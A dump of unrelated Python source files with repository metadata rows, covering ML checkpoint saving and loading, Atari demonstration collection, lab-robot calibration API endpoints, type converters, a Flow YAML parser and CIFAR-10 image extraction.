_remove_paths(obj[key], paths_to_recurse)
# Sort the keys in reverse order, so in the case of a list, the indexing is consistent
keys_to_remove.sort(reverse=True)
# Remove the keys
for key in keys_to_remove:
del obj[key]
def glob_filter(exclude_globs: List[str]) -> Callable[[Dict], None]:
    """Build a callable that prunes a nested state_dict by glob patterns."""

    def filter_func(state_dict: Dict) -> None:
        # Enumerate every '/'-joined key path present in the nested dict.
        paths: List[str] = []
        _flatten_keys(state_dict, paths, '/')

        # Collect all paths matched by any pattern, warning on dead patterns.
        filtered_paths = []
        for exclude_glob in exclude_globs:
            matches = fnmatch.filter(paths, exclude_glob)
            if not matches:
                warnings.warn(
                    f"No parts from loaded checkpoint state_dict were ignored by load_ignore_key {exclude_glob}")
            filtered_paths.extend(matches)

        # De-duplicate (patterns may overlap) and report what will be dropped.
        filtered_paths = list(set(filtered_paths))
        filtered_paths_str = ", ".join(filtered_paths)
        if filtered_paths:
            log.info(f"Ignoring the following paths from the loaded checkpoint state_dict: {filtered_paths_str}")

        # Delete every matched path in place.
        _remove_paths(state_dict, [path.split("/") for path in filtered_paths])

    return filter_func
def _restore_checkpoint(
    state: State,
    composer_states_filepath: str,
    extracted_rank_n: bool,
    extracted_checkpoint_folder: Optional[str],
    load_weights_only: bool,
    strict_model_weights: bool,
    ignore_keys: Optional[Union[List[str], Callable[[Dict], None]]],
) -> Optional[List[Dict[str, Any]]]:
    """Restore a checkpoint into ``state`` and returns the rng state dicts (if ``load_weights_only`` is False)."""
    # Now, all ranks load the checkpoint that local rank zero downloaded
    state_dict = torch.load(composer_states_filepath, map_location='cpu')
    if ignore_keys:
        # Filter provided list of key paths
        if not callable(ignore_keys):
            ignore_keys = glob_filter(ignore_keys)
        # Call function to modify state_dict
        ignore_keys(state_dict)
    log.debug(f"Loaded checkpoint with keys {state_dict.keys()} and state keys {state_dict['state'].keys()}")
    if state.is_model_deepspeed:
        # DeepSpeed restores the model engine from the extracted tarball;
        # every non-zero rank must have its own shard extracted.
        if extracted_checkpoint_folder is None:
            raise RuntimeError("Deepspeed checkpoints require a tarball, not a weights file.")
        global_rank = dist.get_global_rank()
        if global_rank > 0 and not extracted_rank_n:
            raise RuntimeError(f"Deepspeed checkpoint missing for rank {global_rank}")
        load_path, _ = state.deepspeed_model.load_checkpoint(
            extracted_checkpoint_folder,
            tag=_DEEPSPEED_TAG,
            load_module_only=load_weights_only,
            load_module_strict=strict_model_weights,
        )
        if load_path is None:
            raise RuntimeError(f"Failed to load DeepSpeed checkpoint")
    elif load_weights_only:
        # Non-DeepSpeed weights-only path: restore just the model weights.
        state.load_model_state(state_dict['state'], strict=strict_model_weights)
    if not load_weights_only:
        # Full restore: timers, optimizers, schedulers, etc.
        state.load_state_dict(state_dict['state'])
    # RNG states are returned so the caller can restore them per rank.
    return state_dict['rng']
def save_checkpoint(
    state: State,
    filename: str = "ep{epoch}-ba{batch}-rank{rank}",
    *,
    weights_only: bool = False,
) -> List[pathlib.Path]:  # noqa: D103
    # (The docstring is attached dynamically below via ``save_checkpoint.__doc__``
    # so the format-variable table can be interpolated.)
    state_dict = {
        'state': state.state_dict(),
        'rng': reproducibility.get_rng_state(),
    }
    if weights_only and not state.is_model_deepspeed:
        # Weights-only reduction applies only on the non-DeepSpeed path;
        # DeepSpeed writes its own state files below.
        state_dict['state'] = {"model": state_dict['state']['model']}
    checkpoint_filepath = format_name_with_dist_and_time(filename, state.run_name, state.timestamp)
    if state.is_model_deepspeed and not is_tar(checkpoint_filepath):
        # Deepspeed requires tarballs; appending `.tar`
        checkpoint_filepath += ".tar"
    with tempfile.TemporaryDirectory() as tmpdir:
        composer_states_filepath = os.path.join(tmpdir, _COMPOSER_STATES_FILENAME)
        if dist.get_global_rank() == 0:
            # Only rank zero saves the composer state dict
            with open(composer_states_filepath, 'xb') as f:
                torch.save(state_dict, f)
        if state.is_model_deepspeed:
            state.deepspeed_model.save_checkpoint(tmpdir, _DEEPSPEED_TAG)
        # Move the checkpoint to the correct location
        checkpoint_dirname = os.path.dirname(checkpoint_filepath)
        if is_tar(checkpoint_filepath) and (state.is_model_deepspeed or dist.get_global_rank() == 0):
            # Either deepspeed (and every rank needs to call this),
            # or not deepspeed (but using an archive), in which case only rank zero should call this.
            if checkpoint_dirname:
                os.makedirs(checkpoint_dirname, exist_ok=True)
            write_mode = _get_write_mode(checkpoint_filepath)
            with tarfile.open(checkpoint_filepath, write_mode) as tarball:
                # add files flat to the tarball with the specified compression
                tarball.add(tmpdir, arcname="")
        elif dist.get_global_rank() == 0:
            # if not an archive, then only saving the states
            # only rank zero saves the state dict
            if checkpoint_dirname:
                os.makedirs(checkpoint_dirname, exist_ok=True)
            shutil.move(composer_states_filepath, checkpoint_filepath)
        else:
            # This rank saved nothing; report no path for it.
            checkpoint_filepath = None
    # Ensure that all processes wait for the checkpoint to be saved.
    dist.barrier()
    if checkpoint_filepath is not None:
        log.info('Saved checkpoint at %s', checkpoint_filepath)
    # Gather the paths across ranks.
    paths = dist.all_gather_object(checkpoint_filepath)
    paths = list(pathlib.Path(path) for path in paths if path is not None)
    return paths
save_checkpoint.__doc__ = f"""Checkpoint the training ``state``.
Args:
state (State): The training state.
logger (Logger): The logger.
filename (str): A format string describing how to name checkpoints.
(default: ``'ep{{epoch}}-ba{{batch}}-rank{{rank}}'``)
The following format variables are available:
{textwrap.indent(FORMAT_NAME_WITH_DIST_AND_TIME_TABLE, prefix=' ')}
.. note::
* By default, only the rank zero process will save a checkpoint file.
* When using DeepSpeed, each rank will save a checkpoint file in tarball format. DeepSpeed
requires tarball format, as it saves model and optimizer states in separate files.
Ensure that ``'{{rank}}'`` appears within the ``filename``. Otherwise, multiple ranks
may attempt to write to the same file(s), leading to corrupted checkpoints. If no tarball file
extension is specified, ``.tar`` will be used.
* To use compression (regardless of whether DeepSpeed is enabled), set the file extension
to ``'.tar.gz'``, ``'.tgz'``, ``'.tar.bzip'``, or ``'.tar.lzma'`` (depending on the desired
compression algorithm).
.. warning::
Using compression will block the training loop while checkpoints are being compressed. As such, we
recommend saving checkpoints without compression.
Consider the following scenario, where:
* The default ``name='ep{{epoch}}-ba{{batch}}-rank{{rank}}'`` is used.
* The current epoch count is ``1``.
* The current batch count is ``42``.
When DeepSpeed is not being used, the rank zero process will save the checkpoint to ``'ep1-ba42-rank0'``.
When DeepSpeed is being used, each rank (process) will save checkpoints to::
ep1-ba42-rank0.tar
ep1-ba42-rank1.tar
ep1-ba42-rank2.tar
...
weights_only (bool, optional): If ``True``, save only the model weights instead of the entire training state.
(default: ``False``)
.. note::
When using DeepSpeed, this parameter must be ``False``. Weights-only checkpointing is not currently
compatible with DeepSpeed,
Returns:
List[pathlib.Path]: The list of checkpoint files saved, indexed by the rank of the process.
.. note::
When using DeepSpeed, each process (rank) saves its own checkpoint file.
When doing multi-node training, the filepaths are valid only on each process's node;
Composer does not move checkpoint files between nodes.
Otherwise, when not using DeepSpeed, each list will contain only one filepath,
since only the rank zero process saves checkpoints.
"""
| 44.744186
| 127
| 0.635005
|
4a0f3500d6451c3e1d2032ed67ccd67497bdc331
| 4,354
|
py
|
Python
|
examples/atari/collect_demos_ale.py
|
pratyushpal/chainerrl
|
fec001305e9b552ba9c69be01aa92b774dbc69c4
|
[
"MIT"
] | 1
|
2019-08-19T15:23:54.000Z
|
2019-08-19T15:23:54.000Z
|
examples/atari/collect_demos_ale.py
|
pratyushpal/chainerrl
|
fec001305e9b552ba9c69be01aa92b774dbc69c4
|
[
"MIT"
] | null | null | null |
examples/atari/collect_demos_ale.py
|
pratyushpal/chainerrl
|
fec001305e9b552ba9c69be01aa92b774dbc69c4
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from __future__ import absolute_import
from builtins import * # NOQA
from future import standard_library
standard_library.install_aliases() # NOQA
import argparse
import os
from chainer import links as L
from chainer import optimizers
import gym
import gym.wrappers
import numpy as np
import chainerrl
from chainerrl.action_value import DiscreteActionValue
from chainerrl import agents
from chainerrl import experiments
from chainerrl import links
from chainerrl import misc
from chainerrl import replay_buffer
from chainerrl.wrappers import atari_wrappers
def main():
    """Replay a trained DQN agent on an Atari env and collect demonstrations.

    Loads agent weights from ``--load`` and writes collected demonstrations
    (and optional monitor output) under ``--outdir``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--env', type=str, default='BreakoutNoFrameskip-v4',
                        help='OpenAI Atari domain to perform algorithm on.')
    parser.add_argument('--outdir', type=str, default='results',
                        help='Directory path to save output files.'
                             ' If it does not exist, it will be created.')
    parser.add_argument('--seed', type=int, default=0,
                        help='Random seed [0, 2 ** 31)')
    parser.add_argument('--gpu', type=int, default=0,
                        help='GPU to use, set to -1 if no GPU.')
    parser.add_argument('--load', type=str, default=None, required=True)
    parser.add_argument('--logging-level', type=int, default=20,
                        help='Logging level. 10:DEBUG, 20:INFO etc.')
    parser.add_argument('--render', action='store_true', default=False,
                        help='Render env states in a GUI window.')
    parser.add_argument('--monitor', action='store_true', default=False,
                        help='Monitor env. Videos and additional information'
                             ' are saved as output files.')
    parser.add_argument('--steps', type=int, default=5 * 10 ** 7,
                        help='Total number of demo timesteps to collect')
    args = parser.parse_args()

    import logging
    logging.basicConfig(level=args.logging_level)

    # Set a random seed used in ChainerRL.
    misc.set_random_seed(args.seed, gpus=(args.gpu,))

    args.outdir = experiments.prepare_output_dir(args, args.outdir)
    print('Output files are saved in {}'.format(args.outdir))

    def make_env():
        # Standard DeepMind preprocessing, but keep full episodes and raw
        # rewards since demonstrations should reflect real gameplay.
        env = atari_wrappers.wrap_deepmind(
            atari_wrappers.make_atari(args.env, max_frames=None),
            episode_life=False,
            clip_rewards=False)
        env.seed(int(args.seed))
        # Randomize actions like epsilon-greedy
        env = chainerrl.wrappers.RandomizeAction(env, 0.01)
        if args.monitor:
            env = gym.wrappers.Monitor(
                env, args.outdir,
                mode='evaluation')
        if args.render:
            env = chainerrl.wrappers.Render(env)
        return env

    env = make_env()
    n_actions = env.action_space.n
    q_func = links.Sequence(
        links.NatureDQNHead(),
        L.Linear(512, n_actions),
        DiscreteActionValue)

    # Draw the computational graph and save it in the output directory.
    chainerrl.misc.draw_computational_graph(
        [q_func(np.zeros((4, 84, 84), dtype=np.float32)[None])],
        os.path.join(args.outdir, 'model'))

    # The optimizer and replay buffer are dummy variables required by agent
    opt = optimizers.RMSpropGraves()
    opt.setup(q_func)
    rbuf = replay_buffer.ReplayBuffer(1)

    def phi(x):
        # Feature extractor
        return np.asarray(x, dtype=np.float32) / 255

    Agent = agents.DQN
    agent = Agent(q_func, opt, rbuf, gpu=args.gpu, gamma=0.99,
                  explorer=None, replay_start_size=1,
                  minibatch_size=1,
                  target_update_interval=None,
                  clip_delta=True,
                  update_interval=4,
                  phi=phi)

    agent.load(args.load)

    # saves demos to outdir/demos.pickle
    experiments.collect_demonstrations(agent=agent,
                                       env=env,
                                       steps=args.steps,
                                       episodes=None,
                                       outdir=args.outdir,
                                       max_episode_len=None)
if __name__ == '__main__':
main()
| 36.283333
| 77
| 0.618282
|
4a0f35631dd37618e8a2d68a6b1828b8b5484692
| 3,633
|
py
|
Python
|
robot-server/robot_server/service/legacy/routers/deck_calibration.py
|
fakela/opentrons
|
676f1296a515fd5db15777e732bc77cf74364ac4
|
[
"Apache-2.0"
] | null | null | null |
robot-server/robot_server/service/legacy/routers/deck_calibration.py
|
fakela/opentrons
|
676f1296a515fd5db15777e732bc77cf74364ac4
|
[
"Apache-2.0"
] | null | null | null |
robot-server/robot_server/service/legacy/routers/deck_calibration.py
|
fakela/opentrons
|
676f1296a515fd5db15777e732bc77cf74364ac4
|
[
"Apache-2.0"
] | null | null | null |
from uuid import UUID
from opentrons.config import robot_configs
from starlette import status
from fastapi import APIRouter, Depends
from opentrons.hardware_control import ThreadManager
import opentrons.deck_calibration.endpoints as dc
from robot_server.service.dependencies import get_hardware
from robot_server.service.errors import V1HandlerError
from robot_server.service.legacy.models import V1BasicResponse
from robot_server.service.legacy.models.deck_calibration import DeckStart, \
DeckStartResponse, DeckCalibrationDispatch, PipetteDeckCalibration, \
CalibrationStatus, DeckCalibrationStatus
router = APIRouter()
@router.post("/calibration/deck/start",
             description="Begin (or restart) a deck calibration session",
             responses={
                 status.HTTP_403_FORBIDDEN: {"model": V1BasicResponse},
                 status.HTTP_409_CONFLICT: {"model": V1BasicResponse}
             },
             response_model=DeckStartResponse,
             status_code=status.HTTP_201_CREATED)
async def post_calibration_deck_start(
        command: DeckStart = DeckStart(),
        hardware: ThreadManager = Depends(get_hardware)) \
        -> DeckStartResponse:
    """Create a deck calibration session and return its token and pipette info.

    Session-layer errors are translated into HTTP errors (403/409).
    """
    try:
        res = await dc.create_session(command.force, hardware)
        return DeckStartResponse(token=UUID(res.token),
                                 pipette=PipetteDeckCalibration(**res.pipette))
    except dc.SessionForbidden as e:
        # Session layer refused to create a session.
        raise V1HandlerError(status_code=status.HTTP_403_FORBIDDEN,
                             message=str(e))
    except dc.SessionInProgress as e:
        # A session already exists -- presumably bypassable via
        # `command.force`; confirm in dc.create_session.
        raise V1HandlerError(status_code=status.HTTP_409_CONFLICT,
                             message=str(e))
@router.post("/calibration/deck",
             description="Execute a deck calibration action",
             response_model=V1BasicResponse,
             responses={
                 418: {"model": V1BasicResponse},
                 status.HTTP_403_FORBIDDEN: {"model": V1BasicResponse},
                 status.HTTP_400_BAD_REQUEST: {"model": V1BasicResponse},
             })
async def post_calibration_deck(operation: DeckCalibrationDispatch) \
        -> V1BasicResponse:
    """Dispatch one calibration command to the active session.

    Returns the dispatcher's message on success. Failures map to HTTP
    errors: 418 when no session exists, 403 when forbidden, 400 when the
    dispatcher reports an unsuccessful result, 500 for anything else.
    """
    try:
        res = await dc.dispatch(
            token=str(operation.token),
            command=operation.command,
            command_data=operation.dict(exclude={'token', 'command'},
                                        exclude_none=True))
        if not res.success:
            # Reported failure is routed through the AssertionError handler
            # below so it becomes a 400.
            raise AssertionError(res.message)
        return V1BasicResponse(message=res.message)
    except dc.NoSessionInProgress as e:
        message = str(e)
        status_code = 418
    except dc.SessionForbidden as e:
        message = str(e)
        status_code = status.HTTP_403_FORBIDDEN
    except AssertionError as e:
        message = str(e)
        status_code = status.HTTP_400_BAD_REQUEST
    except Exception as e:
        message = f'Exception {type(e)} raised by dispatch of {operation}: {e}'
        status_code = status.HTTP_500_INTERNAL_SERVER_ERROR
    # Only reached when one of the handlers above ran; success returns early.
    raise V1HandlerError(status_code=status_code, message=message)
@router.get("/calibration/status",
            description="Get the calibration status",
            response_model=CalibrationStatus)
async def get_calibration_status(
        hardware: ThreadManager = Depends(get_hardware)) -> CalibrationStatus:
    """Report deck and instrument calibration status.

    Deck status comes from the hardware controller; calibration data is
    read from the persisted robot config.
    """
    robot_conf = robot_configs.load()
    return CalibrationStatus(
        deckCalibration=DeckCalibrationStatus(
            status=hardware.validate_calibration(),
            data=robot_conf.gantry_calibration),
        instrumentCalibration=robot_conf.instrument_offset)
| 39.923077
| 79
| 0.676301
|
4a0f370e6b97448be4b7d1b8a1f1ede21c38228e
| 314
|
py
|
Python
|
[Kaleido-subs]/Completed/Higurashi no Naku Koro ni [BD]/ac_Higurashi1BD_20.py
|
tuilakhanh/Encoding-Projects
|
8b254913457cb28e7d0890ad6b974d0d8f0cbecc
|
[
"MIT"
] | 57
|
2019-01-31T17:32:46.000Z
|
2022-03-23T05:46:51.000Z
|
[Kaleido-subs]/Completed/Higurashi no Naku Koro ni [BD]/ac_Higurashi1BD_20.py
|
tuilakhanh/Encoding-Projects
|
8b254913457cb28e7d0890ad6b974d0d8f0cbecc
|
[
"MIT"
] | null | null | null |
[Kaleido-subs]/Completed/Higurashi no Naku Koro ni [BD]/ac_Higurashi1BD_20.py
|
tuilakhanh/Encoding-Projects
|
8b254913457cb28e7d0890ad6b974d0d8f0cbecc
|
[
"MIT"
] | 12
|
2019-04-30T06:16:13.000Z
|
2022-03-14T16:15:07.000Z
|
#!/usr/bin/env python3
import vapoursynth as vs
import acsuite
import lvsfunc as lvf
ac = acsuite.AC()
core = vs.core

# Source clip for this BD volume; VDecimate is applied so the audio trim
# frame numbers line up with the decimated video.
path = r'BDMV/HIGURASHI_BD/00021.m2ts'
src = lvf.src(path)
src = core.vivtc.VDecimate(src)

if __name__ == "__main__":
    # Cut everything except the last 24 frames' worth of audio.
    # `path[:-4] + "wav"` replaces the 'm2ts' extension with 'wav'
    # (the trailing dot is kept by the slice).
    ac.eztrim(src, [(0, -24)], path[:-4]+"wav", "Higurashi1BD_20_cut.wav")
| 20.933333
| 74
| 0.694268
|
4a0f38b9f7e6a6b2eaeab23afa7e8fcdef99c1ec
| 5,445
|
py
|
Python
|
sourdough/project/converters.py
|
WithPrecedent/sourdough
|
52d99ca056cda93fb3e913fbca3d9a5947ec3513
|
[
"Apache-2.0"
] | null | null | null |
sourdough/project/converters.py
|
WithPrecedent/sourdough
|
52d99ca056cda93fb3e913fbca3d9a5947ec3513
|
[
"Apache-2.0"
] | null | null | null |
sourdough/project/converters.py
|
WithPrecedent/sourdough
|
52d99ca056cda93fb3e913fbca3d9a5947ec3513
|
[
"Apache-2.0"
] | null | null | null |
"""
converters: type converters specific to the project subpackage
Corey Rayburn Yung <coreyrayburnyung@gmail.com>
Copyright 2020-2021, Corey Rayburn Yung
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
Contents:
"""
from __future__ import annotations
import dataclasses
import pathlib
from typing import (Any, Callable, ClassVar, Dict, Iterable, List, Mapping,
Optional, Sequence, Tuple, Type, Union, get_args,
get_origin)
import sourdough
@dataclasses.dataclass
class SettingsConverter(sourdough.Converter):
    """Type converter for Settings.

    Args:
        base (str): name of the base type this converter targets ('settings').
        parameters (Dict[str, Any]): keyword arguments applied during
            conversion (empty by default).
        alternatives (Tuple[Type]): alternative types accepted for conversion.
    """
    base: str = 'settings'
    parameters: Dict[str, Any] = dataclasses.field(default_factory = dict)
    # Tuple literal instead of tuple([...]): same value, no throwaway list.
    alternatives: Tuple[Type] = (pathlib.Path, Mapping)
@dataclasses.dataclass
class FilerConverter(sourdough.Converter):
    """Type Converter for Filer.

    Args:
        base (str): name of the base type this converter targets ('filer').
        parameters (Dict[str, Any]): keyword arguments applied during
            conversion; the 'settings' key presumably names the project
            attribute to inject -- confirm in sourdough.Converter.
        alternatives (Tuple[Type]): alternative types accepted for conversion.
    """
    base: str = 'filer'
    parameters: Dict[str, Any] = dataclasses.field(
        default_factory = lambda: {'settings': 'settings'})
    # Tuple literal instead of tuple([...]): same value, no throwaway list.
    alternatives: Tuple[Type] = (pathlib.Path, Mapping)
@dataclasses.dataclass
class WorkerConverter(sourdough.Converter):
    """Type converter for Worker.

    Args:
        base (str): name of the base type this converter targets ('component').
        parameters (Dict[str, Any]): keyword arguments applied during
            conversion; 'self' presumably refers to the project instance --
            confirm in sourdough.Converter.
        alternatives (Optional[Tuple[Type]]): alternative types accepted for
            conversion (none for this converter).
    """
    base: str = 'component'
    parameters: Dict[str, Any] = dataclasses.field(
        default_factory = lambda: {'project': 'self'})
    alternatives: Optional[Tuple[Type]] = None
@dataclasses.dataclass
class WorkersConverter(sourdough.Converter):
    """Type converter for Workers.

    Args:
        base (str): name of the base type this converter targets ('component').
        parameters (Dict[str, Any]): keyword arguments applied during
            conversion.
        alternatives (Optional[Tuple[Type]]): alternative types accepted for
            conversion (none for this converter).
    """
    base: str = 'component'
    parameters: Dict[str, Any] = dataclasses.field(
        default_factory = lambda: {'project': 'self'})
    alternatives: Optional[Tuple[Type]] = None

    def validate(self, item: Any, instance: object) -> object:
        """Convert each entry of ``item`` into a validated worker.

        Args:
            item: iterable of worker specifications; when falsy, falls back
                to the '<name>_workers' entry of ``instance.settings``.
            instance: object providing ``settings``, ``name``, and
                ``initialize_converter``.

        Returns:
            Sequence[base.Worker]: validated workers.
        """
        if not item:
            try:
                item = instance.settings[instance.name][
                    f'{instance.name}_workers']
            except KeyError:
                # NOTE(review): if `item` stays None here, the loop below
                # raises TypeError -- confirm callers always pass a sequence.
                pass
        new_workers = []
        for worker in item:
            converter = instance.initialize_converter(
                name = 'worker',
                converter = 'worker')
            new_workers.append(converter.validate(
                item = [worker, 'worker'],
                instance = instance))
        return new_workers
@dataclasses.dataclass
class CreatorConverter(sourdough.Converter):
    """Type converter for Creator.

    Args:
        base (str): name of the base type this converter targets ('creator').
        parameters (Dict[str, Any]): keyword arguments applied during
            conversion (empty by default).
        alternatives (Optional[Tuple[Type]]): alternative types accepted for
            conversion (none for this converter).
    """
    base: str = 'creator'
    parameters: Dict[str, Any] = dataclasses.field(default_factory = dict)
    alternatives: Optional[Tuple[Type]] = None
@dataclasses.dataclass
class CreatorsConverter(sourdough.Converter):
    """Type converter for Creators.

    Args:
        base (str): name of the base type this converter targets ('creator').
        parameters (Dict[str, Any]): keyword arguments applied during
            conversion (empty by default).
        alternatives (Optional[Tuple[Type]]): alternative types accepted for
            conversion (none for this converter).
    """
    base: str = 'creator'
    parameters: Dict[str, Any] = dataclasses.field(default_factory = dict)
    alternatives: Optional[Tuple[Type]] = None

    def validate(self, item: Any, instance: object) -> object:
        """Convert each entry of ``item`` into a validated creator.

        NOTE(review): each entry is wrapped as ``[creator, 'worker']``;
        the 'worker' literal looks like a copy/paste from
        WorkersConverter.validate -- confirm whether 'creator' was intended.
        """
        new_creators = []
        for creator in item:
            converter = instance.initialize_converter(
                name = 'creator',
                converter = 'creator')
            new_creators.append(converter.validate(
                item = [creator, 'worker'],
                instance = instance))
        return new_creators
@dataclasses.dataclass
class ComponentConverter(sourdough.Converter):
    """Type converter for Component.

    Args:
        base (str): name of the base type this converter targets ('component').
        parameters (Dict[str, Any]): keyword arguments applied during
            conversion; the literal 'str' value's meaning is not evident
            here -- confirm against sourdough.Converter.
        alternatives (Optional[Tuple[Type]]): alternative types accepted for
            conversion (none for this converter).
    """
    base: str = 'component'
    parameters: Dict[str, Any] = dataclasses.field(
        default_factory = lambda: {'name': 'str'})
    alternatives: Optional[Tuple[Type]] = None
@dataclasses.dataclass
class WorkflowConverter(sourdough.Converter):
    """Type converter for Workflow.

    Args:
        base (str): name of the base type this converter targets ('workflow').
        parameters (Dict[str, Any]): keyword arguments applied during
            conversion (empty by default).
        alternatives (Optional[Tuple[Type]]): alternative types accepted for
            conversion (none for this converter).
    """
    base: str = 'workflow'
    parameters: Dict[str, Any] = dataclasses.field(default_factory = dict)
    alternatives: Optional[Tuple[Type]] = None
@dataclasses.dataclass
class ResultsConverter(sourdough.Converter):
    """Type converter for Results.

    Args:
        base (str): name of the base type this converter targets ('results').
        parameters (Dict[str, Any]): keyword arguments applied during
            conversion; maps 'name' and 'identification' onto attributes of
            the same names.
        alternatives (Optional[Tuple[Type]]): alternative types accepted for
            conversion (none for this converter).
    """
    base: str = 'results'
    parameters: Dict[str, Any] = dataclasses.field(
        default_factory = lambda: {'name': 'name',
                                   'identification': 'identification'})
    alternatives: Optional[Tuple[Type]] = None
| 26.82266
| 76
| 0.583655
|
4a0f392d5da81f6fc506db611d28ee6f4881758f
| 2,491
|
py
|
Python
|
jina/jaml/parsers/flow/legacy.py
|
HarshCasper/jina
|
81ab098b140b74ad1cfdfde9218cec7a40923749
|
[
"Apache-2.0"
] | 1
|
2021-02-25T19:28:50.000Z
|
2021-02-25T19:28:50.000Z
|
jina/jaml/parsers/flow/legacy.py
|
HarshCasper/jina
|
81ab098b140b74ad1cfdfde9218cec7a40923749
|
[
"Apache-2.0"
] | 1
|
2021-02-27T05:56:45.000Z
|
2021-02-27T05:57:03.000Z
|
jina/jaml/parsers/flow/legacy.py
|
deepampatel/jina
|
97f9e97a4a678a28bdeacbc7346eaf7bbd2aeb89
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict, Any, Type
from ..base import VersionedYAMLParser
from ....enums import PodRoleType
from ....flow.base import BaseFlow
from ....helper import expand_env_var, ArgNamespace
from ....parsers import set_gateway_parser, set_pod_parser
class LegacyParser(VersionedYAMLParser):
    """Parser for Flow YAML documents that carry no explicit version tag."""

    version = 'legacy'  # the version number this parser is designed for

    def parse(self, cls: Type['BaseFlow'], data: Dict) -> 'BaseFlow':
        """
        :param cls: target class type to parse into, must be a :class:`JAMLCompatible` type
        :param data: flow yaml file loaded as python dict
        :return: the constructed Flow object with its pods added
        """
        p = data.get('with', {})  # type: Dict[str, Any]
        a = p.pop('args') if 'args' in p else ()
        k = p.pop('kwargs') if 'kwargs' in p else {}
        # maybe there are some hanging kwargs in "parameters"
        # (environment variables in values are expanded before use)
        tmp_a = (expand_env_var(v) for v in a)
        tmp_p = {kk: expand_env_var(vv) for kk, vv in {**k, **p}.items()}
        obj = cls(*tmp_a, **tmp_p)

        pp = data.get('pods', {})
        for pod_name, pod_attr in pp.items():
            p_pod_attr = {kk: expand_env_var(vv) for kk, vv in pod_attr.items()}
            if pod_name != 'gateway':
                # ignore gateway when reading, it will be added during build()
                obj.add(name=pod_name, **p_pod_attr, copy_flow=False)
        return obj

    def dump(self, data: 'BaseFlow') -> Dict:
        """
        :param data: versioned flow object
        :return: the dictionary given a versioned flow object
        """
        r = {}
        if data._version:
            r['version'] = data._version
        if data._kwargs:
            r['with'] = data._kwargs
        if data._pod_nodes:
            r['pods'] = {}
            if 'gateway' in data._pod_nodes:
                # always dump gateway as the first pod, if exist
                r['pods']['gateway'] = {}
            for k, v in data._pod_nodes.items():
                if k == 'gateway':
                    continue
                kwargs = {'needs': list(v.needs)} if v.needs else {}
                parser = set_pod_parser()
                if v.role == PodRoleType.GATEWAY:
                    parser = set_gateway_parser()
                # only persist arguments that differ from the parser defaults
                non_default_kw = ArgNamespace.get_non_defaults_args(v.args, parser)
                kwargs.update(non_default_kw)
                if 'name' in kwargs:
                    # the pod name is already the dict key
                    kwargs.pop('name')
                r['pods'][k] = kwargs
        return r
| 33.662162
| 91
| 0.571658
|
4a0f3a2dfc5fa5124278f15de09106c4d17e915e
| 2,395
|
py
|
Python
|
Classification/bins/parse_cifar_to_png.py
|
ttthomaschan/DeepcvLib
|
18f7728559136a3c5c8ad54666788ea771e95b16
|
[
"MIT"
] | null | null | null |
Classification/bins/parse_cifar_to_png.py
|
ttthomaschan/DeepcvLib
|
18f7728559136a3c5c8ad54666788ea771e95b16
|
[
"MIT"
] | null | null | null |
Classification/bins/parse_cifar_to_png.py
|
ttthomaschan/DeepcvLib
|
18f7728559136a3c5c8ad54666788ea771e95b16
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
# @file name : parse_cifar10_to_png.py
# @author : Junlin Chen
# @date : 2021-06
# @brief : 将cifar10数据pickle形式解析成png格式
"""
import numpy as np
import os
import sys
import pickle
from imageio import imwrite
def unpickle(file):
    """Deserialize a CIFAR pickle file and return its contents as a dict.

    CIFAR-10 batches were pickled under Python 2, so under Python 3 the
    payload must be read with ``encoding='bytes'`` (dict keys become bytes).

    Using a ``with`` block (instead of open/close) guarantees the file
    handle is released even if deserialization raises.
    """
    with open(file, 'rb') as fo:
        if sys.version_info < (3, 0):
            return pickle.load(fo)
        return pickle.load(fo, encoding='bytes')
def my_mkdir(my_dir):
    """Create directory ``my_dir`` (with parents) if it does not already exist.

    ``exist_ok=True`` replaces the check-then-create pattern, which was
    race-prone and behaves the same way: no-op when the directory exists,
    FileExistsError when the path exists but is not a directory.
    """
    os.makedirs(my_dir, exist_ok=True)
def pasre_pickle_img(pkl_data):
    """Extract one (image, label) pair from an unpickled CIFAR batch dict.

    NOTE(review): the record index comes from the *global* loop variable
    ``i`` set in the ``__main__`` block below -- this function is only
    callable from inside those loops. Consider passing the index explicitly.
    """
    img = np.reshape(pkl_data[b'data'][i], (3, 32, 32))
    label_n = str(pkl_data[b'labels'][i])
    img = img.transpose((1, 2, 0))  # c*h*w --> h*w*c
    return img, label_n
def check_data_dir(path_data):
    """Print a warning message when ``path_data`` does not exist."""
    if os.path.exists(path_data):
        return
    print("文件夹不存在,请检查数据是否存放到data_dir变量:{}".format(path_data))
if __name__ == '__main__':
    BASE_DIR = os.path.dirname(__file__)
    cifar_dir = r"G:\deep_learning_data\cifar10"  # data root directory
    data_dir = os.path.join(cifar_dir, "cifar-10-batches-py")  # source (pickle) data directory
    check_data_dir(data_dir)

    train_o_dir = os.path.join(cifar_dir, "cifar10_train")  # output directories
    test_o_dir = os.path.join(cifar_dir, "cifar10_test")

    # train data
    for j in range(1, 6):
        data_path = os.path.join(data_dir, "data_batch_" + str(j))  # data_batch_12345
        train_data = unpickle(data_path)
        print(data_path + " is loading...")

        for i in range(0, 10000):
            # Parse image and label (pasre_pickle_img reads the global `i`)
            img, label_num = pasre_pickle_img(train_data)
            # Create a per-label output folder
            o_dir = os.path.join(train_o_dir, label_num)
            my_mkdir(o_dir)
            # Save the image; the batch offset keeps filenames unique
            img_name = label_num + '_' + str(i + (j - 1)*10000) + '.png'
            img_path = os.path.join(o_dir, img_name)
            imwrite(img_path, img)
        print(data_path + " loaded.")

    # test data
    test_data_path = os.path.join(data_dir, "test_batch")
    test_data = unpickle(test_data_path)
    for i in range(0, 10000):
        # Parse image and label
        img, label_num = pasre_pickle_img(test_data)
        # Create a per-label output folder
        o_dir = os.path.join(test_o_dir, label_num)
        my_mkdir(o_dir)
        # Save the image
        img_name = label_num + '_' + str(i) + '.png'
        img_path = os.path.join(o_dir, img_name)
        imwrite(img_path, img)
    print("done.")
| 28.855422
| 87
| 0.598747
|
4a0f3ac0bb26f645cb1b9e2d08a44d8572f220e4
| 10,725
|
py
|
Python
|
humblebee/importer.py
|
steinitzu/humblebee
|
7c6e9434669640b38953bacf9fd167ce82a3cbba
|
[
"MIT"
] | 9
|
2019-10-25T19:05:19.000Z
|
2021-11-27T08:36:00.000Z
|
humblebee/importer.py
|
steinitzu/humblebee
|
